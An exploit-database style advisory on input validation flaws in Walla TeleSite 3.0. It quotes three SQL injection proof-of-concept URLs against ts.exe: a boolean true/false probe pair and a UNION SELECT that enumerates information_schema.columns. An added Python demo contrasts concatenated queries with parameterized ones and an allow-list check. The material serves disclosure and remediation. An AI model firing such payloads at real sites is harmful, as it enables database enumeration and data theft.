Vendor: Walla TeleSite
By:
CVSS: 7.5 (HIGH)
CWE: 20 (Input Validation)
Product Name: Walla TeleSite
Affected Version From: 3
Affected Version To: Earlier versions
Patch Exists: NO
Related CWE:
CPE: a:walla_telesite:walla_telesite:3.0
Metasploit:
Other Scripts:
Platforms Tested:

Input Validation Vulnerabilities in Walla TeleSite

Walla TeleSite is prone to multiple input validation vulnerabilities. These vulnerabilities occur due to a lack of proper sanitization of user-supplied input. The vulnerabilities include information and path disclosure, file enumeration, SQL injection, and cross-site scripting attacks within the context of the victim's Web browser and the affected computer. Other attacks may also be possible.

Mitigation:

To mitigate these vulnerabilities, validate and sanitize all user-supplied input before it is used. Keeping the software up to date with the latest patches and security updates is also advised.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/15419/info
  
Walla TeleSite is prone to multiple input validation vulnerabilities. These are due to a lack of proper sanitization of user-supplied input.
  
Walla TeleSite is prone to information and path disclosure, file enumeration, SQL injection, and cross-site scripting attacks within the context of the victim's Web browser and the affected computer.
  
Other attacks are also possible.
  
Walla Telesite version 3.0 is affected; earlier versions are also affected. 

http://www.example.com/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%20'1'='1

http://www.example.com/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%20'1'='2

http://www.example.com/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%EF'%20or%201=1%20union%20all%20select%20top%201%20null,null,null,null,null,
null,null,null,null,'nuli','zulu','papa','qqq','rar','ewe',table_name,'asd','ttt','werwr','ryy','poo','polo','nike'%20from%20information_schema.columns--
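
The first two URLs above differ only in the final condition of the `sug` value ('1'='1 versus '1'='2), so a vulnerable query answers them differently. The following is an added example, not code from the advisory or from the product: it shows a concatenated query beside a parameterized one and an allow-list check. The `tours` table, the function names, the allowed character set and the use of SQLite in place of the product's real backend are all assumptions.

```python
import re
import sqlite3
from urllib.parse import unquote

# The `sug` values from the page's first two URLs, percent-decoded.
PROBE_TRUE = unquote("%61%61%61'%20and%20'1'='1")
PROBE_FALSE = unquote("%61%61%61'%20and%20'1'='2")

# Assumed allow-list for a search term: letters, digits, space, hyphen.
ALLOWED = re.compile(r"[\w \-]{1,64}")


def make_db():
    # Constructed sample data; schema is hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tours (name TEXT)")
    db.executemany("INSERT INTO tours VALUES (?)", [("aaa",), ("bbb",)])
    return db


def search_vulnerable(db, sug):
    # Flaw class described on the page: input concatenated into SQL text.
    sql = "SELECT name FROM tours WHERE name = '" + sug + "'"
    return [row[0] for row in db.execute(sql)]


def search_parameterized(db, sug):
    # The value is bound as data and cannot alter the query structure.
    sql = "SELECT name FROM tours WHERE name = ?"
    return [row[0] for row in db.execute(sql, (sug,))]


def validate_sug(sug):
    # Reject anything outside the allow-list before it reaches the query.
    return ALLOWED.fullmatch(sug) is not None


def differs(search):
    # True when the two probes produce different result sets.
    db = make_db()
    return search(db, PROBE_TRUE) != search(db, PROBE_FALSE)


if __name__ == "__main__":
    print("concatenated query distinguishes probes:", differs(search_vulnerable))
    print("parameterized query distinguishes probes:", differs(search_parameterized))
    print("probe passes allow-list:", validate_sug(PROBE_TRUE))
```

With bound parameters both probes are treated as literal search terms and return the same empty result, so the true/false differential disappears.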